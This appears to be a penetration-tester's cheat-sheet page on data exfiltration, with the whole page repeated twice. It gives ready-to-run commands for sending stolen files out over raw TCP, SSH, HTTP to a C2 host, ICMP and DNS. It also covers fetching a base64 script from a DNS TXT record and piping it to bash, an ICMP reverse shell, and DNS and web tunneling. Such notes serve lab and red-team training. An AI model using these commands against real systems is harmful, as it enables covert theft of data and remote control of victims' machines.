Exfiltration

TCP

# Starts a listener on the attackers machine
nc -lvp 11223 > /tmp/stolen.data

# On the victim machine, encode the data and send it over socket
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080

# On attacker machine, decode and read data
cd /tmp && dd conv=ascii if=stolen.data |base64 -d > stolen.tar && tar xvf stolen.tar

SSH

# Sends data over ssh to attacker
tar cf - stolen/ | ssh attacker@evil.com "cd /tmp/; tar xpf -"

HTTP/S

PHP code to log data sent over post requests:

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

Data Exfiltration:

# Sends data to attacker
curl --data "file=$(tar zcf - stolendata | base64)" http://c2.evil.com/contact.php

# Fix broken base64
sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -

Tunneling

# Generate Tunnel Files
python3 neoreg.py generate -k keyfile

# Upload generated file at https://attacker.com/uploader

# start tunnel 
python3 neoreg.py -k thm -u http://10.10.63.2/uploader/files/tunnel.php

# Read webpage
curl --socks5 127.0.0.1:1080 http://172.20.0.121:80/path/to/file.txt

ICMP

# Start metasploit listener for ICMP
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp
set INTERFACE eth0
run

# Send file over from victim
sudo nping --icmp -c 1 10.10.63.2 --data-string "BOFfile.txt"
sudo nping --icmp -c 1 10.10.63.2 --data-string "some random data"
sudo nping --icmp -c 1 10.10.63.2 --data-string "EOF"

# Use ICMPDOOR for a icmp reverse shell. Start on victum
sudo icmpdoor -i eth0 -d 192.168.0.133

# Connect from attackbox
sudo icmp-cnc -i eth1 -d 192.168.0.121

DNS

# Capture incoming DNS requests
sudo tcpdump -i eth0 udp port 53 -v 

# Split data into DNS subdomains
cat secrets.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/dns.attacker.com/

# Send data to attacker DNS server
cat secrets.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/dns.attacker.com/ | awk '{print "dig +short " $1}' | bash

# Run a script that is base64 encoded in a txt record
dig +short -t TXT script.attacker.com | tr -d "\"" | base64 -d | bash

DNS Tunneling TCP

# Start Iodine on attacker server
sudo iodined -f -c -P Attackerpass 10.1.1.1/24 tunnel.attacker.com

# Connect to Iodine from victim
sudo iodine -P Attackerpass tunnel.attacker.com

# Ssh over that new network, all traffic will be over DNS
ssh user@10.1.1.2 -4 -f -N -D 1080
# Retrieve webpage over DNS proxy
curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

Living off trusted sites

PreviousWindows Persistence NextKernal

Last updated 2 years ago

Exfiltration

TCP

# Starts a listener on the attackers machine
nc -lvp 11223 > /tmp/stolen.data

# On the victim machine, encode the data and send it over socket
tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080

# On attacker machine, decode and read data
cd /tmp && dd conv=ascii if=stolen.data |base64 -d > stolen.tar && tar xvf stolen.tar

SSH

# Sends data over ssh to attacker
tar cf - stolen/ | ssh attacker@evil.com "cd /tmp/; tar xpf -"

HTTP/S

PHP code to log data sent over post requests:

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

Data Exfiltration:

# Sends data to attacker
curl --data "file=$(tar zcf - stolendata | base64)" http://c2.evil.com/contact.php

# Fix broken base64
sudo sed -i 's/ /+/g' /tmp/http.bs64
cat /tmp/http.bs64 | base64 -d | tar xvfz -

Tunneling

# Generate Tunnel Files
python3 neoreg.py generate -k keyfile

# Upload generated file at https://attacker.com/uploader

# start tunnel 
python3 neoreg.py -k thm -u http://10.10.63.2/uploader/files/tunnel.php

# Read webpage
curl --socks5 127.0.0.1:1080 http://172.20.0.121:80/path/to/file.txt

ICMP

# Start metasploit listener for ICMP
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp
set INTERFACE eth0
run

# Send file over from victim
sudo nping --icmp -c 1 10.10.63.2 --data-string "BOFfile.txt"
sudo nping --icmp -c 1 10.10.63.2 --data-string "some random data"
sudo nping --icmp -c 1 10.10.63.2 --data-string "EOF"

# Use ICMPDOOR for a icmp reverse shell. Start on victum
sudo icmpdoor -i eth0 -d 192.168.0.133

# Connect from attackbox
sudo icmp-cnc -i eth1 -d 192.168.0.121

DNS

# Capture incoming DNS requests
sudo tcpdump -i eth0 udp port 53 -v 

# Split data into DNS subdomains
cat secrets.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/dns.attacker.com/

# Send data to attacker DNS server
cat secrets.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/dns.attacker.com/ | awk '{print "dig +short " $1}' | bash

# Run a script that is base64 encoded in a txt record
dig +short -t TXT script.attacker.com | tr -d "\"" | base64 -d | bash

DNS Tunneling TCP

# Start Iodine on attacker server
sudo iodined -f -c -P Attackerpass 10.1.1.1/24 tunnel.attacker.com

# Connect to Iodine from victim
sudo iodine -P Attackerpass tunnel.attacker.com

# Ssh over that new network, all traffic will be over DNS
ssh user@10.1.1.2 -4 -f -N -D 1080
# Retrieve webpage over DNS proxy
curl --socks5 127.0.0.1:1080 http://192.168.0.100/test.php

Living off trusted sites

PreviousWindows Persistence NextKernal

Last updated 2 years ago